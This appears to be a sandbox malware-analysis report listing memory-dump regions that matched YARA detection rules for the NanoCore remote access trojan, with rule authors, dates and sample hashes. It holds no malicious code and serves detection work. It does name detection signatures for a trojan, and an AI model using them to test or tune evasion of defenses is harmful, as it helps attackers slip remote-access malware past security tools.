Source: 00000018.00000002.2302925101.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2258235244.0000000001E90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
